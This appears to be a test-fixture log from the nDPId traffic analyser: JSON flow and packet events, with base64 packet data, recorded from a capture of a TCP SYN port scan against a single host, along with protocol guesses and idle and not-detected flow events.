+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAslfEAACwGhoGsEAAIQA2GNIzTF3XdU4MZAAAAAGACBAAdFwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsB4gAADsGBeusEAAIQA2GNIzTBFbdU4MZAAAAAGACEAAkNgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ7wAADkG57asEAAIQA2GNIzTCp7dU4MZAAAAAGACCAAl7gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsUvkAADoGu3msEAAIQA2GNIzTBFDdU4MZAAAAAGACDAAoPAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ3YAADUGq\/ysEAAIQA2GNIzTBxTdU4MZAAAAAGACCAApeAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsTd8AAC4GzJOsEAAIQA2GNIzTATLdU4MZAAAAAGACDAArWgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsYRgAADUGslqsEAAIQA2GNIzTC9fdU4MZAAAAAGACCAAktQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAs4skAACoGO6msEAAIQA2GNIzTCWHdU4MZAAAAAGACDAAjKwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAs3AEAACgGRHGsEAAIQA2GNIzTB0fdU4MZAAAAAGACBAAtRQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsEIIAAC4GCfGsEAAIQA2GNIzTwADdU4MZAAAAAGACDABsiwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsSxwAADUGyFasEAAIQA2GNIzTJErdU4MZAAAAAGACCAAMQgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsk5cAACsGidusEAAIQA2GNIzTImDdU4MZAAAAAGACEAAGLAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsHsIAACgGAbGsEAAIQA2GNIzTBBndU4MZAAAAAGACBAAwcwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAssGQAACgGcA6sEAAIQA2GNIzTCDfdU4MZAAAAAGACBAAsVQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsGsUAADQG+a2sEAAIQA2GNIzTBETdU4MZAAAAAGACBAAwSAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsALEAADsGDMKsEAAIQA2GNIzTE4rdU4MZAAAAAGACEAAVAgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAs5sAAACYGO7KsEAAIQA2GNIzTE4bdU4MZAAAAAGACDAAZBgAAAgQFtA=="} +00783{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"1":"Match by port"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00783{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"1":"Match by port"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3390,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9535,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5440,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5440,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 